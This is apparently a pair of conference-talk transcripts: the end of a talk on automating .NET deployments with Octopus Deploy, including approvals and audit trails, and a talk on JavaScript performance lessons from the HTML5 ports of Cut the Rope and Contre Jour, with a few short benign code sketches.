and it's going to go back and redeploy the version exactly as it sat at.24. Now this is valuable because if you have written any, say, deployment scripts, like a deploy.ps1 or something to handle your deployment process, since that is checked in alongside your application, it's versioned with your application. And that means that, let's say it's a website and you've got some static assets that are served out of a folder called dist. And for whatever reason, you decide you need to change the name of that folder to public. So you go and change your deploy.ps1 that's generating those static assets to start putting them into.public. If your build script is centrally managed, then if you have to go redeploy an old version of your app, now it's putting the static assets in the wrong place. The old version expects them to be under dist, but now your build script is putting them under public. By having your build script versioned along with your application, redeploying an old version is still going to work because it's going to use the version of the build script as it existed at the time that that package was created. It's also going to snapshot all of the variables that you could define in your Octopus deploy portal with that version. 
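Octopus deploy does that IIS re-point for you, but to make the idea concrete, the equivalent done by hand is just an update of the site's physical path. A sketch using the WebAdministration module, with a made-up site name and the versioned folder layout described above:

    Import-Module WebAdministration

    # Point the existing site at the freshly extracted, already-transformed folder.
    Set-ItemProperty "IIS:\Sites\ComplexCommerce" -Name physicalPath `
        -Value "C:\Octopus\Applications\Development\ComplexCommerce.Web\2.0.7.26"

    # Rolling back (or redeploying an old release) is just pointing it at a previous folder:
    # Set-ItemProperty "IIS:\Sites\ComplexCommerce" -Name physicalPath `
    #     -Value "C:\Octopus\Applications\Development\ComplexCommerce.Web\2.0.7.25"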
So even if you go and change a connection string or a variable for future deployments, redeploying that old version to any environment is still going to use the snapshot of the variables as they existed at that time. What about the database? That's the biggest question I always get with Octopus deploy. My answer is, what about the database? No. Octopus deploy doesn't have any built-in support for database deployment. It doesn't have any database magic built in, mostly because database deployments are hard if you guys have tried that. There are a few tools out there that will help. I have previously set up a system in the past where we were using Redgate's SQL source control product, if you guys have seen that, that lets you check all your database scripts and everything into your Git repository and it automatically versions them and everything. It set up a system where I was using that and then using Redgate's SQL compare command line tool that I ran in an Octopus deploy package that would go ahead and compare the scripts as they existed at that version to whatever environment I was deploying into and it would apply those changes. It didn't work worth a damn. That command line tool was not very good and it would fail on all random stuff all the time. There is a few other products depending on how you do your database development that are like Roundhouse that you can actually version your scripts right there with your app and run it. That's one way you can go about your database deployment. Another tool is called Ready Roll SQL and it integrates in Visual Studio and uses the SQL database project types and does kind of a similar concept where it goes ahead and versions your database and creates a version table in there so it knows what version you're deploying and what scripts go with that version and will apply those migrations for you. Database migrations are great as long as you're going forward. Going back to database is a big problem but that brings up a really interesting point. As you get into continuous delivery you're going to find that rollbacks become a thing of the past. A rollback is not something you should really do. When you have a good continuous delivery system and you have good repeatable automated deployments there becomes less and less need to roll back simply because if you found something wrong with your deployment there was a bug in your software or some kind of problem. It's really a lot easier I found to most of the time just go fix that bug, commit it, rebuild the package and push out the new deployment, roll forward instead of rolling backward because do you really want to abandon your new deployment just to go fix a bug or would you rather say hey let's get all these features out here and fix this bug. When you've got a good fast repeatable system it becomes really easy to do that. So let's take a look at what kind of stuff we can do with our deployment process in Octopus. If I come here on the process tab you see I've got all these steps like notify release manager and approval and then deploying all these NuGet packages. If I click add step we'll look at all the things that are available to us. I can tell it I want to deploy a NuGet package. I can tell it I want to run a random PowerShell script maybe this script handles pulling a server out of a load balancer and then at the end I want to put it back in. I can send an email, I can say that there's manual intervention required, we'll show that in just a minute. 
I can tell it I want to deploy something to Windows Azure, upload something over FTP. So let's take a look at these email and approval steps because these are really interesting. If I come over here to our releases and we've got this O.26 release and we've deployed it to development and we've deployed it to staging and it's been all signed off by QA and said this thing is ready to go to production let's send it out. Okay well I'm just a developer I don't have permission to deploy to production but I'm going to go ahead and do it anyway because you know hey come stop me if you don't like it right. Well guess what somebody has already set this up so that whenever I go and deploy this release to production it says oh and look at this this little guy popped up and said on my little local mail server here saying that an email has been sent let's view that message. So here's this nice email that came in that says hey release dude ready to deploy this version to production and follow the link below to approve this and if I was in a real mail client it would be clickable but I'm not so we're going to copy and paste. So we will copy this lovely lovely link here and let's go take a look at the current status of octopus deploy and look at this it's paused even if we go to our dashboard we can see hey this is waiting it's chilling it's not doing anything yet and it says here that approval is required and it's assigned to no one let me show the details of that and it says hey a new release is ready for deployment to the production environment click the green button to proceed with deployment now although the button is not green but I don't have permission to do this I'm not in the group that's allowed to release so let me open up an incognito window that does not have my cookies in it and paste this in and we're going to come here and sign in as release dude. 
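Stepping out of the approval demo for a second: that "run a PowerShell script" step mentioned a moment ago is where something like the load balancer dance would live. The sketch below is purely hypothetical; the REST endpoints are made up, and the machine name comes from Octopus's built-in variables (the exact name may vary by version):

    # Hypothetical load balancer API - swap in whatever your load balancer actually exposes.
    $machine = $OctopusParameters["Octopus.Machine.Name"]
    $poolUrl = "http://loadbalancer.internal/api/pools/web"

    # Script step at the start of the process: drain this node before deploying to it.
    Invoke-RestMethod -Method Post -Uri "$poolUrl/$machine/drain"

    # ...the package deployment steps run in between...

    # A second script step at the end of the process puts the node back in rotation:
    # Invoke-RestMethod -Method Post -Uri "$poolUrl/$machine/enable"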
So release dude has already signed in, and he followed that link. He comes here and it says, oh, okay, this needs approval. Oh, look, assigned to me. Let me show the details of that. Great. Well, I can't interact with you yet, because maybe this notification, maybe the people who are allowed to approve this, there's two or three different people who could approve it, so the first one to get there is going to click assign to me. And now I get to do this, and I can put in notes here. I can say, you know, maybe I've got a different change management system that change requests have to go through to get all this approval, and I can put a reference to that ticket in here if I needed to, to say, oh yeah, this was signed off by all the people. I'm just going to say that I'm release dude and I approve this message, vote for me, and I'm going to click proceed, and now it's going to go ahead and finish doing that deployment, right? Well, this becomes really, really powerful, because now you can automate the queuing of a production release. Say you guys do a release to production every night, or every two weeks, or every quarter, whenever it is. You could have that scheduled automatically from TeamCity, and you have the confidence of knowing it's not just going to send that code out without approval. It's going to stop and wait for someone who has the authority to say, yes, this is ready to go and we're ready to push it out to production. Or they could cancel it and say, no, we're not ready to push this out. And that becomes really, really nice. And then if I go look under, oh, this guy doesn't, this guy is not an Octopus administrator, so he can't see the configuration. So let's go back to where I'm the Octopus administrator and can view my configuration, and say, let's look at this audit. What all has been going on here? Okay, here we go. A deployment was queued. Ah, release dude took responsibility for this and then said, yes, I approve it. Let's see the details. Ah, okay, cool. Here's what he did, here's how he changed that record. Great. Now I've got a nice audit trail, and I can even filter this down to say, oh, I think release dude's been up to no good, show me only stuff he's been doing, and I can start sifting through that. Now, in our Octopus deploy configuration, there's this nice little thing in here called the library, right? So this shows me my internal NuGet package store, where I can view my packages that are here. I can manage my external NuGet feeds, if I have any. And then the script modules are really interesting, right? So I can come in here, and I've defined this script module. These are basically like PSM1 files, if you guys have written PowerShell cmdlets. Let's say I've got a bunch of PowerShell that I want to reuse across multiple projects. In my Octopus deploy settings, I can define that here at this level and then make it be included with every project. And if I do that, then in all of my PreDeploy and PostDeploy and Deploy.ps1 files, this Say-Hello cmdlet will be available, and I can make it take parameters and I can bind it to Octopus variables. And this way I can build reusable pieces of functionality, right, that are centralized, but they're not necessarily shared. Rather than having a whole bunch of if statements that say, if it's this project, if it's that project, I can just include the pieces I need and parameterize it and make that available to my other deployment scripts. And then I've also got a nice thing called step templates. This is relatively new. These step templates
are where I can define some of those different steps that need to be in my process that are reusable. And what's really cool is that not only can I define my own, but there's a community library up here that has currently 46 templates that can do all kinds of cool stuff: Chocolatey, ensure packages are installed, you can back up a directory, you can do find and replace, you can interact with git, you can do all this cool stuff with IIS, you can create an MSMQ queue if you need to do that sort of thing, you can notify New Relic that your deployment is complete, update a Rackspace load balancer, here's SQL execute script if you're using SQL scripts for your database migrations, run NUnit. And these are contributed by the community, so you can write your own scripts and contribute them back to the community, right? And you can create local users or get processor load. You can do all kinds of cool stuff here, and you can take these and include them right into your Octopus instance as a step template, or you can define your own. So that little notify release manager step that we had before, I could say, well, I always want to do that, so let me define this at my deployment level. That way this one common step can be included with all of my deployments, and I can define these parameters that are automatically going to become variables in the project that includes these steps. So that becomes a powerful way to share the configuration that you've set up for one project with other projects. And then I can also create variable sets, so if there are sets of common variables that I use a lot throughout my projects, I can define them here so I don't have to repeat those in every project, and I can manage them centrally if I need to. All right, we are just about out of time, so let's see. All right, so that's all I have. Do you guys have any other questions you'd like to ask real quick? No? Yes? Uh-huh. So, I assume you're deploying the Node stuff to Heroku, or are you actually deploying your .NET stuff to Heroku as well? Okay. So could you? Yeah, I mean, you could do a deployment if you wanted to. If you look at stuff like the Windows Azure deployments, those take place on the Octopus server rather than the tentacle, because obviously there's not a tentacle being installed on Azure for a website deployment. You can execute a shell script, right, and some of those step templates that say I'm going to execute this script from the server, from the Octopus deploy server, have git pull and git push, right? So you could, if you really, really, if you really hated life, you could go ahead and package your Node.js app in a NuGet package and have Octopus deploy git push it to Heroku for you. I would not recommend it. I think you're going to be fighting the tool a lot, because it just wasn't made to work with non-.NET products. I would highly recommend using a different tool, like maybe Codeship; it's great for deploying Node apps to Heroku. But yeah, Octopus deploy is great for deploying .NET apps; it's not great for deploying non-.NET apps at the moment. Right, any other questions? No? Okay, well, thank you very much for your time this morning.
|
One of the main tenets of Agile development is to deliver business value to the production environment early and often. That's easy enough if you are delivering one small web app, but what if your application is composed of several web apps across multiple tiers with a large database and maybe even a few Windows services and scheduled tasks? Now you need a deployment system that is built to scale and allows you to automate all of these tasks to achieve consistency in your deployments. In this session I will show you how Octopus Deploy can make these deployments as simple as the click of button. I will also highlight new features in the 2.0 release such as Guided Failure and audit trails.
|
10.5446/50810 (DOI)
|
Hey, guys. Thanks for sticking around for a very, this will be the, well, at least the very last talk of the day. It's not the best. So, hopefully the best. So, my name is Robbie Ingebretsen. Do you guys recognize Ingebretsen as a Norwegian name? I've never asked this in a, when I've spoken before, but is there anybody here who can tell me how to pronounce my name? How do you do it? Okay, I'm not even going to try. So, my great grandfather was from, and this I will get wrong, but it's Skien in Telemark. Cheyenne, I think? Cheyenne? Are you, is anybody from Cheyenne? Do you know Ingebretsens there? Dang it. We, I just went down there actually on this trip and looked for traces of my family. There's a cemetery there, like the main cemetery, and there's two actually, but the big one, like in the downtown area, and we found a whole bunch of Ingebretsens, which may or may not be relatives, but I hope they are. Anyway, so, it's fun for me to be in Norway where I can pronounce my, say my name and people don't have to look at me in a weird way. So, I'm Robbie Ingebretsen, and then this is Joel Fillmore, my good friend and colleague, and together we are a small company called Pixel Lab. We're based out of Seattle, although when you're just two people, you can kind of be based out of wherever your living room is that day. So, this week we're based out of Oslo. So, that's another connection that we have to Norway. So, we are focused primarily on HTML5 and JavaScript and sort of a web stack, although both of us have history with Microsoft technologies. I was part of the WPF and Silverlight teams. Any Microsoft guys here? Couple? Yay. Does anybody use Kaxaml, by chance? It's a little, okay. So, Kaxaml is my, I wrote that. And then Joel was on the SharePoint team at Microsoft. So, two really exciting products that brought us together to work on HTML5 applications. And actually we've had pretty good success with HTML5 stuff. We, in fact, we just won a Webby last week for a project that we did with Red Bull. And we're going to talk about some of the other projects that we've done. But our kind of focus in our, I guess our area of interest is sort of forward looking kinds of HTML5 experiences that sort of push the envelope of what you can do inside of a browser. And that's why performance is kind of a natural fit. And so, for that reason, we thought it would be fun to talk about performance and share some of the things that we've learned about JavaScript performance. And that'll be the focus of the talk today. Tomorrow we have another talk, though, where we're talking more about some of the creative aspects of using HTML5 to create forward looking experiences. And that is called the future of extreme web browsing. And I think it's like tomorrow at, anyway, just look it up. Come, though. It's tomorrow at 10 or 11 somewhere around there. So we'd love to see you guys there, too. So this is us. If you want to track us down, thinkpixelab.com. And then that is my Twitter handle, which you are the only country in the world that will remember that. So I don't need to spend too much time there. And we are Knuthians. And I will let Joel tell you what we mean when we say that. All right. So who is Knuth? This guy. So some of you may recognize him. He's a famous computer scientist. He's a professor emeritus at Stanford University. Most people have heard of Donald Knuth from the series of books that he's written, the most famous of which is the Art of Computer Programming.
So this is the series of books that every serious programmer has on his bookshelf, but it's never read. It's pretty daunting. I've paged through it a few times, but have not read the whole thing. With this particular set of books, and I think his others as well, Donald Knuth promised to send a reward to anyone who found an error in the book. And the reward was a hexadollar, which is 256 cents. And so he would write out the check for a hexadollar. And to date, people take a lot of pride in sort of cashing these checks. And he's written over $20,000 worth of checks, but supposedly very few of those have been cashed because they're kind of like a badge of honor. So he's famous for a number of quotes. We gathered a few of our favorites. This one is Beware of Bugs in the Above Code. I've only proved it correct, not tried it. That's pretty impressive when you have the mental compiler or the mental theorem prover to prove the code correct. The next one is Science is What We Understand Well Enough to Explain to a Computer. Art is Everything Else We Do. This is Robbie's Favorite. I Can't Go to a Restaurant and Order Food because I keep looking at the fonts on the menu. And this is great. You know that Donald Knuth was also the inventor of TeX. This is the performance one that we're going to be talking about today. The quote is, we should forget about small efficiencies, say about 97% of the time. Premature optimization is the root of all evil. So when I was beginning my career at Microsoft, I was a new developer. One of the first tasks I was given was to implement a change to a series of data structures that we had to manipulate in a certain way. And so I wrote some code and I was really sort of new at the time. I was worried that it had to be fast. We were working on a server product where lots of concurrent requests could come in. And I was really careful to optimize this so that it would filter down the set of results in an efficient way. And I checked the code in and the next day I noticed that one of my colleagues had basically undone everything that I had written. And so I sort of mentioned, hey, did you, were there problems in what I had written? He said I had to make a few modifications and it was really difficult to understand. And so that particular piece of code we don't have to worry about from a performance perspective because there are so few items in that list. So I rewrote it so that it's a little simpler to understand. And he said, you know that quote, premature optimization is the root of all evil. I didn't know the quote. But I went and looked it up. And it was sort of a lesson to me that we shouldn't focus on optimization until we're absolutely sure it's necessary. So our kind of approach and what we would like to talk about today is the balance between optimizing code and maintaining code. So on one hand you have maintenance where you want code to be easy to understand for people that have to come in and maintain it. You want it to be efficient to write. And you also want it to be optimized for execution. And those are competing interests. So today we're going to talk a little bit about how to balance those interests. Back to the quote we started with: the beginning is we should forget about small efficiencies, say about 97% of the time. Premature optimization is the root of all evil. The remaining part of the quote is also important. Yet we should not pass up our opportunities in that critical 3%. So that really is the key.
It's to use the tools and methods we have to focus on the things that are most important. And for the rest of it, use the principles that guide us in writing easy to maintain, easy to write code. Okay. So we're going to talk about three different things. The first is tools. So we're going to talk about how tools can guide that process to find the 3% that is worth optimizing. Next we'll talk about an approach-based method where we look for different ways to optimize code rather than focusing in on the specific optimizations of one chunk of code, stepping back and looking at the algorithmic or the method approach to optimizing code. And then third we're going to talk about the process of experimentation and refining. It's an iterative process to get your code into a good state. Okay. Real-world examples. The first one we're going to talk about is a game called Cut the Rope. So Cut the Rope, which I'm sure many of you are familiar with, is a very popular iOS and Android game. We did the HTML5 port for Cut the Rope a few years ago. And it was one of the first big, really challenging HTML5 projects that we did. Before we get too far into the details, for those of you who aren't familiar with Cut the Rope, we'll give you a quick video intro. Cut the Rope is a casual game which was initially released for mobile devices. It's essentially a game where you have to deliver candy to the little green monster called Om Nom by cutting the ropes. Currently it has been distributed on two platforms and in total it has been downloaded more than 60 million times. It's quite successful. We had this basic concept of delivering something from point A to point B in the very beginning of the game. That's when we got the idea of candy being fed to the little green monster. And that idea was absurd and adorable at the same time. So we thought that it's a good way to go. We have more than 6 million play sessions every day. We want to expand, and HTML5 is just another great platform to expand to; it will bring us many more users, many more players. Have any of you guys played Cut the Rope? Okay, so a lot of people. Anybody played on the web? By chance? Awesome. Well, yeah, so that was the project that we did. And it was a big project. Yes, I think when we first started out they gave us the Objective-C code base. It was about 150 files, 15,000 lines of code. They had written their own custom physics engine. So that was a little daunting to see all that code, given a relatively short project timeline to get that ported. The result was about 1.2 megs of JavaScript unminified. It got much better minified. But you kind of get the sense for what a daunting task this was. During the initial development of the project, we did some early prototypes. So we took the ropes, which are sort of the premier element in Cut the Rope. You want those to look amazing. And we wanted to see if we could do one rope. And so the challenges with the ropes are that they used polygons to render those, and they had some pretty complex calculations to do Bézier curves to make sure that the ropes felt lifelike so that they would swing, the physics felt right, and they looked beautiful. So on the left, you're going to see one of our early prototypes. So this was sort of our first attempt. We ported the code, used the same approach that they did, and this is the result. So you can see that the rope is a little slow. What you're seeing is definitely not 60 frames a second.
You can see as the rope sort of curls down, there's some artifacts sort of at the kink where it was difficult to render those polygons in a small amount of area. And on the right is the final version of the game. And so this is sort of one section of the game. It's still a single rope. But there's much more going on in this. You can see that the spider is traversing the path of the rope, which is changing according to the physics engine. The sort of blower up at the top is sending an impulse of wind, which affects the candy, the rope, the path the spider's on. So it's significantly more complicated. There's a lot of elements. So our concern was how do we go from the prototype on the left where we're barely like rendering a rope. It doesn't look great to the full game where we have multiple ropes, multiple game objects, lots of animation, lots of forces going on. And so that was a real concern and challenge. And we weren't sure that we were going to be able to do it. So let's talk about how we did it. The first thing that we did is fire up our profiler and memory debugger. And this was sort of the profile that we got. So you can see that there's actually not that much memory being used. This is over a relatively short period of time. So I think this total period is two seconds. And what you're seeing with that sawtooth pattern is the number of memory allocations go up, and then the garbage collector comes in and goes down. And so we've got at least two or three garbage collections per second there. So sort of the quick intro to how garbage collection works. We've got, well, we're from Seattle, and Seattle drinks a lot of coffee. So the easy way to understand garbage collection is if you had a coffee mug and you had a disposable coffee cup, and imagine you needed to drink, I don't know, 20 cups of coffee every 16 milliseconds. Yeah, 16 milliseconds to draw a frame. And so every sort of object that you allocate has to be collected at some point, right? So maybe it's not that bad if you drink 20. If you drink maybe 100, that's a little more work for the garbage collector. It's going to require more processing time, JavaScript is single threaded. So typically they'll pause and collect the garbage and then let it resume. And it just gets worse and worse. So you can imagine how bad it got. We did the profiler. And there's a couple interesting things in this profiler. Typically when I'm profiling an app, I will sort by the exclusive time. So I'll look at functions where a lot of work is being done. And those are up at the top pretty obvious. So there's bezier calculations, so that's calculating the curves on the rope. There's the constraint engine, which is the physics and the objects and how those interact. Some more bezier calculations. And you can see sort of the difference that the typical approach with JavaScript is methods are underscores or lower case, lower camel case, and objects are uppercase. So there's sort of two objects in there. You can see the vector and the array. So they're not necessarily at the top of the list. They're not taking the most amount of time. They are definitely in the top 10, but they're not the highest. But the count right there is pretty important. So you can see over that two or three second period that we allocated 2.2 million vector objects. That's a lot of vectors. And so you can imagine the amount of pressure that puts on the garbage collector, which has to go in there and collect all those objects that are no longer being used. 
Similarly with the arrays, that's not as bad as the vector, but 262,000 arrays is pretty significant. So after the profiling, we were able to get this down. So sort of the end game, so you can see the difference from that initial prototype where we had one rope that was barely rendering to the full game. We went from 2.2 million vector allocations down to about 30,000, which is still pretty high. But given the amount of calculations and they're going on the game, it's much, much better. The array allocations we got down significantly as well, 262,000 down to just 400. So how did we do that? We're going to go through a little bit of code. This is the intensive part of the talk. And we'll show you a simple example of how we were able to get rid of those allocations. So on the left, we have the native implementation of a vector. So it's a struct. Those are relatively lightweight. You have some utility methods that are static to add and multiply vectors. Those are pretty straightforward. You add the X and Y coordinate or you multiply by a scalar. And then we have the direct port. So this is sort of our naive direct port implementation of a vector where we would do the same thing. We had a static or a utility method to add two vectors and the same thing for multiply. And so the key here is that new. You're allocating a new vector every time you need to add. So the vectors in this example are used by a game object. So a game object could be omnum. It could be the candy. It could be a piece of the rope. It could be any element in the game. And so it's pretty common for a game object to have a position within the screen. And forces will act upon that game object to move it around. So in this case, we apply an impulse to an object. And basically what that does is it takes the delta or the time slice that has occurred since the last frame was rendered and figures out the distance that the object should move based on the impulse that was applied to that object. So you can see that we're basically doing two things. We're multiplying the impulse force by the time slice to get the offset. And then we're adding that to the position. So that would be basically moving a character according to some speed. So here's our first attempt at reducing the number of allocations. We realized quickly that we're changing the position of a game object or a game element. We don't need to allocate a new vector for that, right? Because he just needs to know his position. We don't need to create a new element and then sign that new element. That's just asking the garbage collector to do extra work to collect that extra element. So the first thing we did was instead of a static method to add a vector which has the new inside there, we created an instance method which adds the X and Y coordinates of another vector to the existing vector. And so this was perfect for the position because the object only needs to keep track of its position. And we move the object according to that impulse. There's no vector added. So we're able to get rid of quite a few vector allocations using techniques like that. So here's the multiply. We can't do the same thing for the multiply though, right? If we were to multiply the impulse vector in place, then it changes the speed of the object. You can't do that. So the strategy there is to use local variables and just do the calculation in place. And this is, again, going back to the quote that we talked about at the beginning, not something that we would do in every place where a vector is used. 
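Since the slides aren't reproduced here, a simplified sketch of the two versions just described may help. This is illustrative code in the spirit of the talk, not the actual Cut the Rope source:

    // Direct port: every add allocates a brand-new Vector, which is where the
    // millions of short-lived objects in the memory profile came from.
    function Vector(x, y) { this.x = x; this.y = y; }

    Vector.add = function (a, b) {
        return new Vector(a.x + b.x, a.y + b.y);
    };

    // First fix: mutate the existing vector instead of returning a new one.
    Vector.prototype.addInPlace = function (other) {
        this.x += other.x;
        this.y += other.y;
        return this;
    };

    function GameObject(x, y) { this.position = new Vector(x, y); }

    // Moving a game object no longer allocates anything on this hot path.
    var candy = new GameObject(10, 20);
    var step = new Vector(0, 0.5);   // reused frame after frame
    candy.position.addInPlace(step);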
And similarly, if you have a convenience method that adds a vector, it's okay to use that in the vast majority of cases. You want to use the profiler to guide your optimization and find the chunks of code that are path critical and that are really constraining the frame rate. And so once you find those, you can use the techniques. That's the 3% to really make them run quickly. For extremely critical paths, we found that inlining the function in the same way that the native compiler would do with the inline hint, it would actually inline the code. You can do the same thing with JavaScript by taking simple functions and avoiding the apply impulse function call entirely and just doing the calculations in place. And the results of that, you can kind of see, this slide is a little bit outdated, but you can see the direct port is in blue. The reusing the same vector after we made that change, we got a little bit better performance. Switching to local variables, performance went up significantly. And inline code where we completely avoided any function call was obviously the best. This was done a couple years ago. We tried it just out of curiosity last night and it's really incredible to see the difference that today's browsers have. It was just astronomical the difference. We wouldn't have found the problem in today's browser because the browser is so fast that it hides the problem. It was kind of crazy to see that because we only cut the rope two and a half years ago or something. It wasn't that long ago. I kind of had this feeling that two years ago browsers got really, really fast and then we've just sort of been living the dream. But it turns out that there's been a huge amount of improvement in what a browser, especially the JavaScript engines, across all browsers are doing right now. It would be interesting if you had a chance to go in and compare old browsers versus new browsers. Yeah. JavaScript engines today are really incredible. So we talked about the memory profile at the beginning and you see the sawtooth pattern. After the changes, you can see the difference that reducing those allocations makes. So it's much smoother. And what that translates into is a higher frame rate. So by the time we were able to ship, we were getting 60 frames a second on most devices and we were really, really happy with those results. So Joel did a great job of kind of explaining, I guess, one of the first approaches to performance should be, which is you see a performance problem and you can mostly, as you're writing your code, like Joel said, you can mostly ignore it, right? Don't optimize until you know there's a problem. Then as the problems begin to emerge, and actually, there's a little caveat with that, obviously. We're assuming that you're writing reasonable code as you go, right? Using best practices. But I guess as we're talking about sort of that tension between writing optimized code versus writing readable code, we're saying that it's okay to write readable, reusable, understandable code rather than focusing on the highly optimized code until you see that there's a problem. Now when you see that there's a problem, Joel did a great job describing one of the first approaches you can take, which is to actually look at your code and use the tools to find the hotspots and then once you find the hotspots, then you can address those directly. But there are times when the code just sort of can't be optimized. 
Like you're trying to accomplish something where the approach actually doesn't allow you to get fast enough. And we ran into this with a project for a game called Contre Jour. Has anybody played this game? It's a little bit less popular than Cut the Rope. It's a super cool game. So those of you who have played it can attest to that. It's really just a super beautiful game. And to understand sort of the pressure we felt in terms of performance, you have to understand who created it. So we wanted to just take a couple of minutes and show you a video. This guy named Max, and I actually don't know his last name, he's a Ukrainian guy and I guarantee this guy is like on the front line right now. But he is dedicated to everything he does. And we had sort of, I guess, the privilege and also the challenge of trying to help port his game to the web. So this is just three minutes about it. Belief in a third world country. You know, the main force that pushes Ukraine forward right now in software development. If it's about gaming scene, it's the stage of early development. We cannot officially buy an Xbox or any Xbox games because we don't have Xbox Live in Ukraine. If I create a game for Xbox Live, I will have no possibility to buy it. Crazy. My name is Max and I'm head of Mokus Games studio. When I started to create games, post match games, it started different market compared to the mobile or Xbox PC, etc. You cannot make a lot of money on a flash market and you need some money to buy pizza and to buy fuel for my motorcycles. When I started, I did one game, one month and release. It is how it is done in the flash world. Now everything changes. We have downloadable markets, we have app stores, we have mobile market and it's much easier to create a product for mobile market. When I started to create Contre Jour, I realized that it's something bigger. So I decided not to release it on a flash platform, but to try to make it mobile. Right now, after the release of Contre Jour, from a financial point of view, we are just free. It's very comfortable when you can wake up, just have a few steps and you are at work. For me, everything is the same. It's my work, here are my friends and it's my hobby, it's what I like to do, so it's everything together. A few years ago, I think it was impossible in Ukraine. We had no developed gaming scene, now everything changes. Do you think you will always be making games? No, definitely no. If you would ask me the same question, 10 years ago you would ask Max, do you think you would be breakdancing all of your life? Yeah, 10 years ago maybe the answer would be yes, but right now I am a game developer. This gym is 4 times for a week and I have another gym just for breakdancing. The second one is 3 times for a week, so one training for a day. It's actually a gymnastics gym. I do some tricking, some parkour. The floor is not the best here for breakdancing. Actually, it's for gymnastics. I'm not in the best fit, but I still can do something. I do this because I have fun. I enjoy it. Even if I get older and I cannot, for example, win some battles no more, but I still enjoy it. When you work, you work with your brain. You challenge mainly your mind. Here you can challenge your body and when I go out from the training, my mind is totally cleared. It's like a reboot. In the former Soviet Union, we had no breakdancing, no modern street dances. I got very interested and I wanted to try. We stopped it there because it just gets more awesome.
That guy is, honestly, we have a huge amount of respect for him and also we know that he could beat us up. When we inherited this project from another agency, this is what he was facing and he was just not happy at all about the way that they were rendering. They call these plasticines. You can see there's like the little, like over, well, I don't know what he's talking about. You can see that there's the native one on the left-hand side and then on, or I guess that would be, on your right-hand side. Then on the left-hand side is what they were rendering inside of HTML5. They were basically just rendering the same object, but making it smaller and using that to produce a gradient. I've enhanced the effect a little bit here. It wasn't quite that bad, but it was pretty bad. He was mad. We took on the project and our job was to come up with a way to render a better highlight on that shape. The thing we ran into is that in the native version of the game, they were using a shader to render that. If you're familiar with the shader, you know that a shader is a tiny little bit of code that you can essentially inject into the GPU and then it runs directly on the GPU. The job of a shader is to evaluate, you know, if it's in 3D to evaluate a triangle or a polygon or if it's in 2D to evaluate an individual pixel or depends on the type of shader, but then modify that pixel according to some small amount of code. GPUs are really, really good at executing this kind of code really, really, really fast. JavaScript engines are not really good at executing that kind of code really, really fast. You can imagine you've got a plasticine that's made up of hundreds of thousands of pixels and to try to execute that code on every single pixel, every single frame is just killing the performance. There's no way to do it. One of the challenges of these plasticines is they're not static. It's not like we could render them once. If you saw during the gameplay, part of the gameplay is to move the plasticines in order to move Petit, who's the main character in the game. It's really a challenge. It's not one of the things where we could render initially and get the shading perfect and then it would be fine. It has to move at the same frame rate as the game because that plasticine is moving, it's contorting its shape. So that's why in that initial implementation they came up with something that actually was really fast, but it did not produce the right result. This was an example where we looked at the code and there was really no way to port the right code over in a way that would essentially meet the performance goals of the game. So the pixel by pixel approach was out. We started looking at some options and the first exercise is we did this little report where we looked at five or six options. The first one we looked at was SVG filters. The thinking here was that SVG has some filters. One of them is a filter that creates an effect like this and we thought maybe we could produce something with that. The issue with this was first of all now we were mixing two media modes because most of the game is rendered into a canvas if you're familiar with that. Then we would have to have this vector object sitting on top of the canvas and then do the job frame by frame to keep those two things in sync. Also you probably know that SVG is not known for its great performance or speed. So we had some concerns about this and worst of all it just didn't look right. So we quickly crossed that one off our list. 
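For context on why a straight port of that shader was never going to fly: emulating a fragment shader in JavaScript means touching every pixel of the plasticine every frame, which is the kind of per-pixel loop sketched below. This is hypothetical code to show the shape of the problem, with the real shader math replaced by a trivial placeholder:

    function shadePlasticine(ctx, width, height) {
        // Placeholder for the real shader math: brighten pixels near the top edge.
        function computeHighlight(pixelIndex) {
            var row = Math.floor(pixelIndex / 4 / width);
            return Math.max(0, 60 - row);
        }

        var frame = ctx.getImageData(0, 0, width, height);
        var data = frame.data;   // RGBA bytes, four per pixel

        // Hundreds of thousands of iterations per shape, per frame, in single-threaded JS.
        for (var i = 0; i < data.length; i += 4) {
            var highlight = computeHighlight(i);
            data[i]     = Math.min(255, data[i]     + highlight); // R
            data[i + 1] = Math.min(255, data[i + 1] + highlight); // G
            data[i + 2] = Math.min(255, data[i + 2] + highlight); // B
        }
        ctx.putImageData(frame, 0, 0);
    }

A GPU runs that per-pixel work in parallel for essentially free; a JavaScript loop cannot finish it inside a 16 millisecond frame budget for shapes this large.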
Then we started trying to break the problem down into chunks. We started thinking are there small bits of the plasticine that we could render individually and then cache some or create if we didn't need to render them that frame or else somehow break the problem down into smaller pieces. So we had this idea what if we divided the plasticine up into this pie and then we can look at each one of those shapes individually only modify the ones that we need to and it kind of breaks the problem down for us to get smaller. We looked at this but we kind of realized that we had problems on the edges where we could break this into multiple pies but kind of on the corners we still had sort of these hard edges. Again it just didn't look right. Plus this quickly began to feel sort of like a tough geometry problem like getting everything to sort of line up properly at the sort of the seams. Our initial hope with this was that we could by dividing it into pie slices eliminate the rendering below the plasticine because typically it's the sun or the moon that's shining down and creating that shadow. So we thought we could eliminate sort of half or more of the plasticine but it turned out that based on the angle and the manipulation of that plasticine it was pretty challenging. But we did gain some insight from that and the insight was that we really only needed to focus on the upper half of the plasticine. So from that we kind of came up with this idea well what if we kind of took the other approach which is we obscured the bottom half. We thought we can do that by just placing sort of another object that was like half the same shape on top of the bottom portion of the plasticine and then kind of fade out the edges. So this actually looked pretty good. So this is where we got with that and you can see it's we're getting a lot closer with that one. We ran into some issues with rendering this one and then also it just the motion still didn't quite feel right on this one. And that but it did again kind of lead us to what we ended up doing ultimately and you know that looks really different than it did in the game. That's funny. But basically what we ended up doing is stroking the edges of each of those shapes with a gradient. And the thing that made this work is in the same way that the shader kind of took advantage of what the GPU can do. We were sort of taking advantage of the native functionality of what you can do in a canvas which is apply a gradient. Right. The canvas probably instructs the GPU but the canvas knows how to render gradient so it knows how to do that math to sort of go from one color to another and by kind of stacking these on top of each other we could get something really close to the effect that ultimately he wanted. And it's funny because on the monitor it doesn't quite look right but. Oh does it really? That's funny. Yeah that's right. Anyway the game looked really really good. And Max I'll be honest Max was kind of only begrudgingly said that this was okay. This was after like you know serious effort trying to find something that would work. That guy is hardcore and we have a ton of respect for him because of it. But in the end we took this approach and the great thing about this is because we were doing something that canvas knew how to do quickly we actually I don't know with this and some other optimizations that we made we actually ended up with a version of the game that was faster and also had was closer to the effect that ultimately they wanted in the game. 
